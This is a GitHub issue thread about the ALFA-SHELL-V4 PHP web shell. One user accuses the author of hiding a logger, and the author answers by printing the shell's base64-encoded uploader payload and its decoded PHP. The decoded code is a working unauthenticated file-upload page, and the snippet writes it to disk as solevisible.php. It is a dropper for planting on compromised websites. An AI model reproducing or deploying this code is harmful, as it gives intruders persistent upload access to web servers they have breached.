### ISSUE TITLE
Logger Detected

### ISSUE THREAD

**Issue by diahadi** [solevisible/ALFA-SHELL-V4#1]
How many results did you get when someone else used your shell backdoor?

I got your email in a shell backdoor and it was hidden encrypted using ROT-13. It's useless to create a good tool but with bad intentions.

Logger Found: https://pastebin.com/raw/QAsziHLm
Decrypt Logger: https://pastebin.com/raw/ex7pXiy0
Email Found: fbyrivfvoyr@tznvy.pbz
Email Decrypt: solevisible@gmail.com

Regards
IndoXploit

**Comment by solevisible** [comment]
Hello 
Thanks for trying to find a backdoor.

First of all, this code:

> `$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';
> $alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';`

its encoded using **base64_encode** algorithm **not ROT-13 !!!** 
and after **decode using base64_decode** the result will be :

> `<?php echo "<title>Solevisible Uploader</title>\n<body bgcolor=#000000>\n<br>\n<center><font color=\"white\"><b>Your Ip Address is</b> <font color=\"white\"></font></center>\n<big><font color=\"#7CFC00\"><center>\n";echo $_SERVER['REMOTE_ADDR'];echo "</center></font></a><font color=\"#7CFC00\">\n<br>\n<br>\n<center><font color=\"#7CFC00\"><big>Solevisible Upload Area</big></font></a><font color=\"#7CFC00\"></font></center><br>\n<center><form method='post' enctype='multipart/form-data' name='uploader'>";echo '<input type="file" name="file" size="45"><input name="_upl" type="submit" id="_upl" value="Upload"></form></center>';if(isset($_POST['_upl'])&&$_POST['_upl']== "Upload"){if(@move_uploaded_file($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br>';}else{echo '<b><font color="#7CFC00"><center>Upload failed :(</font></a><font color="#7CFC00"></b><br><br>';}}echo '<center><span style="font-size:30px; background: url(&quot;http://solevisible.com/images/bg_effect_up.gif&quot;) repeat-x scroll 0% 0% transparent; color: red; text-shadow: 8px 8px 13px;"><strong><b><big>solevisible@gmail.com</b></big></strong></span></center>';?>`

As you can see there is our gmail address between **HTML tags** !!!

Thanks.
